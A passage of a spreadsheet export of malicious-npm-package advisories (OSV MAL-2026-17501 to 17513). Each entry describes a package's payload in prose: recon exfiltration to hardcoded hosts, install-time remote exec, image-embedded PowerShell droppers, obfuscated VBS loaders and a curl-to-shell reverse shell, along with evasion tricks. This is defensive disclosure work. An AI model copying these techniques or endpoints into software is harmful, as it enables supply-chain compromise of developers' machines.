a11y-tabindex-manager ships thunderboltRegistry.js, which executes an IIFE on module load that runs a series of local shell commands (cat /etc/hosts, whoami, id, pwd, ifconfig/ip addr, hostname, cat /etc/resolv.conf, uname -a, env | head -50) via child_process.execSync and POSTs each output over plain HTTP to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. A separate beacon labeled 'rce-poc-v3' sends Node.js version, platform, and PID to the same host. child_process is acquired both directly and via a fallback that instantiates a new Module (new module.constructor()) and copies module.paths — an evasion technique to bypass simple require('child_process') scans. The package name resembles a generic accessibility helper, but the shipped registry entry performs host identity, network configuration, user, and environment-variable harvesting with no legitimate purpose.
</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17501</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17502</t>
        </is>
      </c>
      <c r="D159" s="5" t="inlineStr"/>
      <c r="E159" s="5" t="inlineStr"/>
      <c r="F159" s="5" t="inlineStr"/>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr">
        <is>
          <t>npm:botmaker-cli</t>
        </is>
      </c>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr"/>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (86fdc86c67d202ca9938942ef7786534d1b72169187cce13b1cefd8899fa54aa)
On npm install, postinstall.js collects the installer's hostname, username, current working directory, architecture, platform, and network interface list (including private IPs) and POSTs them as JSON to the hardcoded host telemetry-edge.net at /api/v1/telemetry over HTTPS with certificate validation disabled (rejectUnauthorized: false). The same postinstall script reads the HTTP response body, parses it as JSON, and passes the response's `exec` field to child_process.execSync with a 30-second timeout, granting whoever controls telemetry-edge.net arbitrary shell command execution as the installing user on every machine that runs `npm install`. The package's index.js is an inert stub containing only `module.exports = { version: '0.1.19' }` and a comment directing users to a different scoped package (`@botmaker.org/botmaker-cli`), indicating this unscoped name is a lookalike lure whose sole operative payload is the install-time beacon-and-exec channel.
</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17502</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17503</t>
        </is>
      </c>
      <c r="D160" s="5" t="inlineStr"/>
      <c r="E160" s="5" t="inlineStr"/>
      <c r="F160" s="5" t="inlineStr"/>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr">
        <is>
          <t>npm:dom-focus-sentinel</t>
        </is>
      </c>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr"/>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7baf5178b3cd02ae8e6e2c01e8cf305fd9670118428c4d3ef94ac0caef6fc4e8)
thunderboltRegistry.js runs an immediately-invoked function at module load that uses child_process.execSync to run host reconnaissance commands (whoami, id, pwd, ifconfig, ip addr, cat /etc/hosts, hostname) and transmits each command's output, along with Node version, platform, and pid, via fetch GET requests to the hardcoded plain-HTTP endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The package also structurally impersonates Wix internal registry modules by exporting factories keyed on thunderboltRegistry/siteAssetsRegistry/documentManagementRegistry/editorRegistry/corvidRegistry and shipping a manifest with static.parastorage.com unpkg URLs under dom-focus-sentinel@1.0.0, so the exfiltration IIFE fires whenever a consumer requires any of these registry names. The reconnaissance behavior is unrelated to the declared focus-sentinel purpose, and a `beacon=rce-poc` marker is embedded in the exfil traffic.
</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17503</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17504</t>
        </is>
      </c>
      <c r="D161" s="5" t="inlineStr"/>
      <c r="E161" s="5" t="inlineStr"/>
      <c r="F161" s="5" t="inlineStr"/>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr">
        <is>
          <t>npm:dotenv-async</t>
        </is>
      </c>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr"/>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (51d22963a1f1fabe3a8b3f54efcb5053761d385486093200765745297ac2bd16)
The package impersonates the dotenv API but on module load (and again when the bundled CLI runs) invokes a function named dispatchAnalytics in dist/index.cjs that extracts a payload from the APP14 (0xFFED) marker of dist/stest.jpg. The extracted UTF-16LE base64 string is assembled into a VBS file (relay_&lt;time&gt;&lt;rand&gt;.vbs) in the OS temp directory that invokes powershell.exe with -NoProfile -NonInteractive -EncodedCommand, spawned via wscript.exe in detached, windowsHide mode. The decoded PowerShell downloads a second-stage Windows executable from hardwood-studio-obviously-briefing.trycloudflare.com/download/winhost and executes it, giving arbitrary code execution on Windows installers. String-splitting of powershell/wscript and argument tokens is used to evade static matching. A second obfuscated execution vehicle is shipped in dist/enterprise.js: a hex-named obfuscator.io-style loader that RC4-decrypts a base64 blob and executes it via new Function(require, module, __filename, __dirname, &lt;decoded&gt;); this file is not referenced by index.cjs in the current build but is a dormant secondary stage in the tarball. Identity inconsistencies corroborate intent: cli.cjs bundles an inner package.json declaring name node-env-buffer version 2.2.6 while the outer manifest is dotenv-async 1.0.0, and the README points at the unrelated motdotla/dotenv project.
</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17504</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17505</t>
        </is>
      </c>
      <c r="D162" s="5" t="inlineStr"/>
      <c r="E162" s="5" t="inlineStr"/>
      <c r="F162" s="5" t="inlineStr"/>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr">
        <is>
          <t>npm:dotenv-promises</t>
        </is>
      </c>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr"/>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (254f0bcbb8014fb07414eb0b41a898deac682aa8c8b7a8541a0f7538ac274f9a)
The package is published as 'dotenv-promises' but its bundled manifest declares the internal name 'node-env-buffer@2.2.6' and mimics the dotenv API (config/parse/populate/expand) to attract installs of a well-known library. On require of the main entry (dist/index.cjs) and on load of the CLI (dist/cli.cjs), a top-level call to dispatchAnalytics() reads a bundled JPEG at dist/stest.jpg, extracts bytes from the image's APP13 (marker 0xED) segment, writes a randomized 'relay_*.vbs' script into the OS temp directory that invokes powershell.exe with -NoProfile -NonInteractive -EncodedCommand using the extracted string as the payload, and spawns wscript.exe detached with windowsHide:true to run the VBS hidden; the VBS self-deletes after execution. Strings such as 'powershell.exe', 'wscript.exe', '-NoProfile', and '-EncodedCommand' are split and concatenated at runtime to evade static scanners, and a second bundle (dist/enterprise.js) is heavily obfuscated (string-array shift, while(!![]) control-flow flattening). No signature or hash check is performed on the JPEG-embedded payload, giving the publisher arbitrary code execution on any Windows host that installs or imports the package.
</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17505</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17506</t>
        </is>
      </c>
      <c r="D163" s="5" t="inlineStr"/>
      <c r="E163" s="5" t="inlineStr"/>
      <c r="F163" s="5" t="inlineStr"/>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-ftp</t>
        </is>
      </c>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr"/>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5e916c23a0efbd49d3cfcd5993957df7afbade3f454925d0672acc8c9f68245c)
The package's declared main entry index.js unconditionally requires./lib/config, a 4,499,968-byte obfuscator.io-packed file (26,234-entry string array, hex-renamed identifiers, control-flow flattening, top-level IIFE) that executes as soon as any consumer runs `require('hardhat-ftp')`. After string-array decoding the loader resolves to execSync and spawn sinks, and the package declares axios as a dependency, giving the import-time payload both outbound HTTP and local command-execution primitives with the concrete command targets concealed behind the obfuscation. The surrounding package is a cover: it is published under the name hardhat-ftp with a vulnerability-management description, but the README headers, badges, and ecosystem links are lifted from pinojs/pino, and the files under lib/ (proto.js, levels.js, transport.js, multistream.js) mirror the pino source tree. The name/README/code mismatch, the scale of the obfuscation, and the presence of exec+HTTP primitives inside the auto-loaded module match the masquerade-dropper pattern: installing or requiring this package triggers execution of concealed attacker-controlled code on the installer's host.
</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17506</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17507</t>
        </is>
      </c>
      <c r="D164" s="5" t="inlineStr"/>
      <c r="E164" s="5" t="inlineStr"/>
      <c r="F164" s="5" t="inlineStr"/>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-jsx</t>
        </is>
      </c>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr"/>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (62ac44be2745338b73861690e7f979216fdfc6c3797dfa2f450e9063aa4158d1)
The package is published as 'hardhat-jsx' but its metadata, documentation, and lib/ layout impersonate the pino logger (keywords 'fast','logger','stream','json'; shipped docs reference pinojs/pino). The main entry index.js unconditionally requires./lib/config, which is a 4,499,968-byte single-line obfuscator.io artifact — a hex-escaped string array of ~26,234 entries with string-array rotation and control-flow flattening (22,707 decoder-wrapper inlines, 44,499 string-inline changes). A legitimate pino 'config' module is ~1-2KB; a multi-megabyte obfuscated blob auto-loaded by the main entry is a loader/dropper. The surface index.js exports a no-op Express-style middleware whose comment claims it 'triggers a background process', providing a cover story adjacent to the obfuscated require. Loading the package via require/import executes the opaque payload in the installer's process. The name/content mismatch (hardhat-jsx vs. pino impersonation), the stub façade, and the heavily obfuscated auto-loaded module together form a trojan-package shape.
</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17507</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17508</t>
        </is>
      </c>
      <c r="D165" s="5" t="inlineStr"/>
      <c r="E165" s="5" t="inlineStr"/>
      <c r="F165" s="5" t="inlineStr"/>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-plus</t>
        </is>
      </c>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr"/>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (02d908da8470ad86669b080d267b57174ccd77e5fd6ed2c371c430d98e869f2b)
hardhat-plus@2.21.0 is published under a name resembling the Ethereum development tool 'hardhat' but ships README, type definitions, and docs copied verbatim from the unrelated pino logger project (README.md references npmjs.com/package/pino; index.d.ts references github.com/pinojs/pino.git; package.json description is unrelated boilerplate). The package's main entry index.js requires./lib/config, which is a single ~4.5MB heavily obfuscated file using obfuscator.io transforms: hex-named identifiers, a self-mutating shuffled string-array (while(!![]){...f['push'](f['shift']())}), control-flow flattening, dispatched decode helpers, and pervasive \xNN escape literals. This opaque code runs unconditionally the moment the package is imported. There is no legitimate source, minification story, or documented purpose that accounts for a multi-megabyte obfuscated blob being loaded as a 'config' module in a package that presents itself as either a Hardhat plugin or a pino logger. The combination of name-based impersonation, mismatched cover-story documentation, and an obfuscated payload auto-executed on import is the standard delivery shape for supply-chain malware.
</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17508</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17509</t>
        </is>
      </c>
      <c r="D166" s="5" t="inlineStr"/>
      <c r="E166" s="5" t="inlineStr"/>
      <c r="F166" s="5" t="inlineStr"/>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-roof</t>
        </is>
      </c>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr"/>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (25cbf03ad6014824ab078237f83b2b682145928e5effefbe3dcc5deca9ba1e26)
The package presents itself as the pino logger — README, docs/, index.d.ts and LICENSE are copied from pinojs/pino and keywords advertise 'fast, logger, stream, json' — but the package name is 'hardhat-roof', the description references unrelated vulnerability-management functionality, and the author points to jsonspack.com rather than the pino maintainers. The top of index.js executes `require('./lib/config')`, which loads lib/config.js: a 4,373,384-byte file containing obfuscator.io-style string-array obfuscation with a self-rotating decoder (`n['push'](n['shift']())` loop gated by a parseInt sum), hex-escaped character lookups, and dozens of single-letter indirection functions. The remaining lib/ files are small and consistent with pino; only config.js is the oversized opaque blob, and the real pino has no such file. Any consumer that imports or requires this package therefore executes several megabytes of opaque code in-process at load time. The combination of a doppelganger cover story cloned from a popular logger, a mismatched package name and author, and a reachable load-time execution path into a heavily obfuscated multi-megabyte payload is the shape of a trojanized typosquat/doppelganger delivering attacker-controlled code into installer processes.
</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17509</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17510</t>
        </is>
      </c>
      <c r="D167" s="5" t="inlineStr"/>
      <c r="E167" s="5" t="inlineStr"/>
      <c r="F167" s="5" t="inlineStr"/>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr">
        <is>
          <t>npm:internallib_v275</t>
        </is>
      </c>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr"/>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (80c1c6d383b3defb01da235e39e08ce56276d887e63d900aea2ee689836f71b4)
index.js exports a `command` function that invokes `/bin/bash -c` to curl a reverse-shell payload from reverse-shell.sh targeting the hardcoded host 10.0.49.106:443 and pipes the response to `sh`, yielding interactive remote shell access on the installer host whenever the exported API is called. The fetch-and-execute path has no pinning, no hash verification, and runs over an unauthenticated network retrieval. package.json also declares a self-referential dependency on `internallib_v275@^1.0.0`, a dependency-confusion shape consistent with a package targeting an internal registry namespace so that resolution against the public registry pulls this backdoor into internal builds.
</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17510</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17511</t>
        </is>
      </c>
      <c r="D168" s="5" t="inlineStr"/>
      <c r="E168" s="5" t="inlineStr"/>
      <c r="F168" s="5" t="inlineStr"/>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr">
        <is>
          <t>npm:lite-mater</t>
        </is>
      </c>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr"/>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (532663c4102d3cf7310e29ca1eb2b389c5c32c1e541da219b7c4364968f4e807)
package.json declares a postinstall lifecycle hook `wscript.exe 4444.vbs` that runs automatically on `npm install` on Windows hosts. The shipped 4444.vbs (~765 KB) is a multi-layer obfuscated loader: an embedded payload is stored as a large ArtifactBundleHX[] string array, Base64-decoded via MSXML DOM into a byte buffer, then decrypted through a custom XOR routine, an AES forward S-box, and a ChaCha20-IETF stream layer. The reconstructed payload is written to %TEMP%\pfNNNNN.dat and handed to powershell.exe via a two-tier loader whose in-source comments reference PowerShell process hollowing. Identifier and comment strings (`Device Telemetry Aggregator`, `Verdant Signals Corp`) act as a cover story, and the README explicitly claims the package has `No installation scripts` — directly contradicting the postinstall hook. The package ships no library code or legitimate functionality consistent with its stated purpose; its only install-time effect is to detonate the obfuscated Windows loader on the installer's machine.
</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17511</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17512</t>
        </is>
      </c>
      <c r="D169" s="5" t="inlineStr"/>
      <c r="E169" s="5" t="inlineStr"/>
      <c r="F169" s="5" t="inlineStr"/>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr">
        <is>
          <t>npm:lite-matte</t>
        </is>
      </c>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr"/>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4e7b0ae9e42c334c1c22627e60add7a2c5a0d558a2ab65a3af0043e27bb0e686)
package.json declares `"postinstall": "wscript.exe 4444.vbs"`, causing `npm install` to auto-execute a ~765KB Windows Script Host file shipped in the tarball. 4444.vbs is heavily obfuscated: it reconstructs COM ProgIDs (ADODB.Stream, MSXML2.XMLHTTP) at runtime via a Chr/XOR helper, uses XOR-masked hex tables for AES S-boxes and SHA-256 round constants, and stores its real payload as ~700 Base64-shaped chunks in an `ArtifactBundleHX` array decrypted through AES-256-CBC followed by ChaCha20-IETF. The decrypted PowerShell loader is written to `%TEMP%` and handed off to powershell.exe with comments indicating process hollowing. The declared package purpose (a trivial 60-line zod-based email domain checker at src/index.js) is unrelated to the dropper, and the README explicitly states 'No installation scripts. No network requests.' while the manifest ships exactly that. Header cover story labels the script 'Verdant Signals Corp. Device Telemetry Aggregator'.
</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17512</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17513</t>
        </is>
      </c>
      <c r="D170" s="5" t="inlineStr"/>
      <c r="E170" s="5" t="inlineStr"/>
      <c r="F170" s="5" t="inlineStr"/>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr">
        <is>
          <t>npm:lite-matterr</t>
        </is>
      </c>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr"/>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cc9b5f5edaae9103fd26de7cb70e661d78d6948dc3c519fec6b4b62fd471fbfc)
lite-matterr@1.0.0 declares a postinstall hook in package.json that runs `wscript.exe 4444.vbs` on `npm install`. The bundled 4444.vbs is a ~765KB heavily obfuscated VBScript containing layered decryption routines (XOR-masked AES S-boxes, a ChaCha20 stream layer, SHA-256 round constants XORed with 0x5A5A5A5A) and a ~600-entry base64 bundle that it concatenates and decrypts into a PowerShell loader. The decrypted loader is written to %TEMP%\pf&lt;rand&gt;.dat and executed via powershell.exe, with internal comments referencing process hollowing. The README falsely claims 'No network requests. No personal data storage. No installation scripts.', directly contradicting the declared postinstall. The package presents a 'Device Telemetry Aggregator' cover story while actually delivering a multi-stage Windows dropper that achieves code execution on any host that installs the package.
</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17513</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
